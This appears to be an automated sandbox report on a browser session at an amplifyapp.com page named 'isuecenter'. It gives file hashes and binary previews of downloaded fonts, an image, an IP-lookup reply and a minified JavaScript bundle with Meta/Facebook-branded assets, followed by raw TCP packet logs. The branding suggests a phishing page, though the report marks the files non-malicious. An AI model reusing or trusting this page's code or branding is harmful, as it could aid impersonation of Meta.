                                          Preview:.PNG........IHDR..............*w.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............IDATx...wx[.....}$....eg.F"'...hI.....:(3..B..Z Q...RV..@'..(].8P..(#q.]2.8.t........t$}?..@!..G::.n=..@n.=.$..]..2k.k..md6P.....T#S.\.\...[.I...,.....m...I..^........Z.@.(.s...Y.Ca..Z8.y....K{ )!..,Y.,.An..m..w....m%...d.../.J.z._..)I..:.7J...Q.^..... ......2.jXm.N.n.............\....1.5x...}.6A.].|.dU...vKz^.jI.HzJ.O.bO...m..9...&...|.<.U.;.5Z.(I5E...wH.Rn+....=!....O.T...................I:...uV}D.w.|.\.2...HA.~....2..d.(..M....u.^.....|.6g.%.D..%.(..%x....B.6..&Y...:.. ..............@T 7...}..#${...*..x...zZ....*.....7Gur.......}........be....i.\..t...CJ..I..........@$0.............&K....~$.~.%-.....'u.....@....l..2.&.}...~..Y.Cr.'.}...Og.&n(...........b`...i.SM..+....(W.]0'..c2........I..]...2..me....p...4.(o.S.?..;..N.T-..............P....|..z.._P..e.m.o.%y.{]._d......#.s...D..u.\f....*.m}.Cn?..O.c.^.`.$...............(m.:.R.=E.{J
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format (Version 2), TrueType, length 150020, version 772.1280
                                          Category:downloaded
                                          Size (bytes):150020
                                          Entropy (8bit):7.99708187417653
                                          Encrypted:true
                                          SSDEEP:3072:vPtxURbSTtDXSLXe0itudYTPEnus4blfNUqKrC7ZOBS9C3bzlLX4/NKOTD5:P15Die0UPblfNUqLZg9I/Qk5
                                          MD5:D5E647388E2415268B700D3DF2E30A0D
                                          SHA1:97F0942C6627DDD89FB62170E5CAC9A2CBD6C98C
                                          SHA-256:886C86112A804EF1DDD1CB206AF4C8C40E34B73C26652CA231404AA35A6B30D9
                                          SHA-512:50B2FFD7537D0424286936CB7BA566004A664F447E4AAAC8FA40CEB2850EAD6CDB39C957515AE05A07AAEB8F6E3E428C4B95E4EFA3EDCADC9473E9E200BB47D6
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/fonts/fa-solid-900.b6879d41b0852f01ed5b.fd0b155c.woff2
                                          Preview:wOF2......J........0..I..........................8.$. .`..<......D.@..p. .....Dp....z.aD.f.O.=i.x.TUUU....l........g...o~..?..o...........O......l...x}~........!.@/*..U.....>.........{;m.B..w.@^Q^.Z...f ........t....7....`..Lr.......P.B.Jx....J.0).K.T;S........ODg..>@If3..{.7..#.?..t.n'.M...@F....D..S..Gz}.0$.X..D....p5.vw......y.......O8.....F..,i..q.X...$.+..&.4^*....P.x...=....G..b. .1....d....V.u+...;WwMw.L.LwOMuM....Zi.w.[y..!.I.5Y..!.l.....6^..".q.`.:c^.8<..6..^...yK.sK}..f..y;.f....].V;r.d[..M.la/.X6M.q...N.]...fH%.X .t'.?..%....H..?<.:.}(...#.....Jp...2\*@...*.0.)*d....d.j.CM.B.!K...p.a.*...".@.(.6 ......|............1.S..;...'2..2VjC{RFX.;8aG.ZG....._....'......:....<_6.....\..d.h.....7.....Z.2MAT4I.$.....o...~..".sV.......h..^...&4)........!...!).<..n.Na%R.....h.p...KM.h..[.z_.CX zoF..H`.2(U.S.v...;m.UvjA...T........^........._... ....G......2..9L=...s...{........A0w...=.s.......=3w...@w. ...Y......rE.l.Ze...G.....X......A..
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Web Open Font Format, TrueType, length 111676, version 0.0
                                          Category:downloaded
                                          Size (bytes):111676
                                          Entropy (8bit):7.990968035459656
                                          Encrypted:true
                                          SSDEEP:3072:UFPzCo74dzmfJwsSQNGpYiIs5YvANl5y8:U5Co7wzmfJZNGpY3s5YvMlb
                                          MD5:AB459481BB83F2CF53E5DA9D7067323B
                                          SHA1:0425E0156D6295E2A3850DDF286BD8656FBC9FE4
                                          SHA-256:F1A79919A98C308A9E69E9774BBD7DA02C1F8A5083E527D16ACD5BB56079FBE4
                                          SHA-512:9B56EF5EA3A533F037E0CDC1B654E30A5DB56F1BA22AD92D81655E380B6A2FD7ADEFF74386395C1BC5A5CD209E5CE9BF5C92096691EBFE37D0830798B0F8DE24
                                          Malicious:false
                                          Reputation:low
                                          URL:https://fonts.cdnfonts.com/s/14883/Montserrat-Regular.woff
                                          Preview:wOFF.......<................................DSIG...4............GDEF.............6.bGPOS...P..p...4.....GSUB..sh...%..=<x0m.OS/2.......O...`U..Bcmap...........(....cvt .......\..../R.Hfpgm.......b...mM$.|gasp................glyf...h........w*.yhead..n....6...6.F.nhhea..n.... ...$...7hmtx..n....^...\....loca..x@.......0..~.maxp...H... ... ...Yname...h..........H.post......"...WJ.B.prep...x.........K..x..._h.`.........Z........6S:I.3..,..V.q%.R..W....,...t....9i%...F"Wk...p!...==..x.H...?.^.E%%N.r..I.'e.K.._.<.."~..~....m..v.flq....7.O.s.v.....R._.x..b..`...7.K..X..........C8.....Bx..B.g..~.:qZ...A..{q...f.O/.E..wt..:.9..Q..{z..t....pB'..O.N..}.e-.~.O...t.+Z..V..._.....qF.V......:\o...v.n..K`.5c.%1e)L[..Y.....n..i].m'..z..z...v.o.-.....A.Z......#|lSX...X....bMQ\t.KB.Y...q.e..V|\..pc.$.n.[pk<.I.V<.;.?^.1+~...m...x..{.UU....g.=..~e..8..q.`......8"2..-#3.31.2.Q3333#3533.5C335E..K.cjH.d."""7..............9\L...w.k}.g.{...^k....]ko0.1&...[jb.:'.oJ.p.y...|..s...3.$
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):22
                                          Entropy (8bit):3.697845823084411
                                          Encrypted:false
                                          SSDEEP:3:YMKUcLRJyYn:YMKUcmYn
                                          MD5:17E1EAA011E9747E475831AA6C898788
                                          SHA1:DACD8E0EF5FC5AD4871C5183DBBE4C0D0A472297
                                          SHA-256:84C83643678BA77F5C0F248ABEB64E7B29C811177C6CA2C9477AC5AA9D1FE9A0
                                          SHA-512:606CCB43E24FB4AEBABEFBEB7D814C63748863E0EB4A0F2BDB8D1BC7D51FA775A9227BFE21FAC87DEF375030C92A79976790A9B58B320B00B55C8E528A704223
                                          Malicious:false
                                          Reputation:low
                                          Preview:{"ip":"102.165.48.43"}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (38714)
                                          Category:downloaded
                                          Size (bytes):38755
                                          Entropy (8bit):5.953737467457981
                                          Encrypted:false
                                          SSDEEP:768:orY+Q+IERGOlHPXuboQ0wTdsOpK6Kzx/fO83W5oOcBptB5HV:gQ+IGllHmboQ0wTdBYfD3bpP
                                          MD5:7AC94A567416AB851772F556DF3AC9F9
                                          SHA1:C7C13AD2C97A73B748EA351A1D633746A8B47EA8
                                          SHA-256:CFE82838378DF0540C9AF7F42272C09B6A95F054CFA026B21EAB29470B8EC74E
                                          SHA-512:0ED59EC3C122E55BDCE056D226D69784F82D2CAA65CE1B04504FA4A76926F44CB9C3113AC48FDFA15F0DF7FC9572C68546928D74EF4E4A2F300D24FCD9BA95BA
                                          Malicious:false
                                          Reputation:low
                                          URL:https://isuecenter.dig4pnjky2v0q.amplifyapp.com/js/app.94aec170.js
                                          Preview:(function(){"use strict";var e={8595:function(e,t,a){var s=a(9242),o=a(3396);function n(e,t){const a=(0,o.up)("router-view");return(0,o.wg)(),(0,o.j4)(a)}var r=a(89);const i={},l=(0,r.Z)(i,[["render",n]]);var d=l,c=a(2483),p=a(7139),f=a.p+"img/loadingLogo.4eff47490162868e9ff2.085728eb.gif",x=a.p+"img/metaTextLogo.e8c807fc3bccff5a9b1f.7b511c1b.png";const u=e=>((0,o.dD)("data-v-e7e7d034"),e=e(),(0,o.Cn)(),e),h={key:0,id:"",class:""},m=u((()=>(0,o._)("div",{class:"overflow-x-hidden"},[(0,o._)("div",{class:"h-screen overflow-x-hidden overflow-y-hidden w-screen z-100 flex justify-center items-center"},[(0,o._)("img",{src:f,alt:""})])],-1))),v=[m],g={key:1,id:"loadFacebookC",class:""},w=u((()=>(0,o._)("div",{id:"loadFacebookG"},[(0,o._)("div",{id:"blockG_1",class:"facebook_blockG"}),(0,o._)("div",{id:"blockG_2",class:"facebook_blockG"}),(0,o._)("div",{id:"blockG_3",class:"facebook_blockG"})],-1))),b=[w],P={id:"root"},y={class:"bg-white"},A={class:"overflow-x-hidden"},k={class:"header flex fl
                                          No static file info
                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 25, 2024 20:07:07.947613955 CET49674443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:07.963227987 CET49673443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:08.275702000 CET49672443192.168.2.6173.222.162.64
                                          Mar 25, 2024 20:07:15.841650963 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.841689110 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:15.842247963 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.842372894 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.842406034 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:15.842468977 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.842814922 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.842823029 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:15.843034983 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:15.843044996 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.066123962 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.066323042 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.074784040 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.074801922 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.074944973 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.074959040 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.075737953 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.075823069 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.075825930 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.075872898 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.077343941 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.077402115 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.077594995 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.077641964 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.077861071 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.077867985 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.150768995 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.214122057 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.214135885 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.335366011 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.553661108 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.553745031 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.553822994 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.554694891 CET49705443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.554718971 CET4434970513.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.580313921 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.580360889 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.580481052 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.580986977 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.581015110 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.581096888 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.581212997 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.581424952 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.581442118 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.581741095 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.581751108 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.628238916 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.715274096 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.715313911 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:16.715401888 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.715620995 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.715631962 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:16.786941051 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.787451029 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.787475109 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.787817955 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.788173914 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.788235903 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.788671017 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.822171926 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.824337959 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.824346066 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.824677944 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.827792883 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.827792883 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.827853918 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.832225084 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:16.870332003 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:16.935992002 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:16.936518908 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.936531067 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:16.937515974 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:16.937588930 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.938580036 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:16.938643932 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:17.009494066 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:17.009516001 CET44349708172.253.115.104192.168.2.6
                                          Mar 25, 2024 20:07:17.015589952 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.015615940 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.015683889 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.015700102 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.016272068 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.079996109 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080009937 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080044985 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080061913 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080071926 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.080077887 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080105066 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.080121040 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.080142975 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.095464945 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095475912 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095499039 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095510960 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095534086 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.095549107 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095557928 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.095582008 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.095604897 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.098172903 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.098220110 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.165874958 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.165884972 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.165924072 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.165956020 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.165971994 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.165987968 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.166018963 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.166038036 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.181725979 CET49708443192.168.2.6172.253.115.104
                                          Mar 25, 2024 20:07:17.183733940 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.183752060 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.183816910 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.183828115 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.183876038 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.199641943 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.199676991 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.199709892 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.199717999 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.199748039 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.199764967 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.226461887 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.226490974 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.226545095 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.226557016 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.226577997 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.226594925 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.255090952 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.255119085 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.255172014 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.255178928 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.255207062 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.255219936 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.267657995 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.267688990 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.268369913 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.268369913 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.268378973 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.268440962 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.281434059 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.281461954 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.281500101 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.281507015 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.281549931 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.286683083 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.293600082 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.293643951 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.293664932 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.293674946 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.293703079 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.293720961 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.304614067 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.304641008 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.304677963 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.304692030 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.304716110 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.304732084 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.315468073 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.315495968 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.315536976 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.315543890 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.315572023 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.315588951 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.326334000 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.326370001 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.326399088 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.326410055 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.326432943 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.326450109 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.337455034 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.346220970 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.346250057 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.346282959 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.346290112 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.346329927 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.351475954 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.351505041 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.351532936 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.351545095 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.351564884 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.351605892 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.351717949 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.351732016 CET4434970413.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.351742029 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.351771116 CET49704443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.360358000 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.360377073 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.360405922 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.360419035 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.360428095 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.360465050 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.373601913 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.373636007 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.373667955 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.373706102 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.377896070 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.389503002 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.389525890 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.389565945 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.389575958 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.389606953 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.389624119 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.417676926 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.442146063 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442157984 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442183018 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442194939 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442203999 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.442209005 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442241907 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.442254066 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.442289114 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.457891941 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.457921028 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.457951069 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.457972050 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.458045006 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.461323023 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.461352110 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.461405039 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.461429119 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.461442947 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.461519957 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.465774059 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.465852022 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.465857029 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.465868950 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.465951920 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.466109037 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.466123104 CET4434970713.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.466135979 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.466227055 CET49707443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.471877098 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.471946955 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.471954107 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.488919020 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.488934040 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.488972902 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.488981962 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.489027023 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.503458023 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.503473997 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.503546000 CET49706443192.168.2.613.249.39.10
                                          Mar 25, 2024 20:07:17.503559113 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.549108982 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.549132109 CET4434970613.249.39.10192.168.2.6
                                          Mar 25, 2024 20:07:17.549176931 CET49706443192.168.2.613.249.39.10
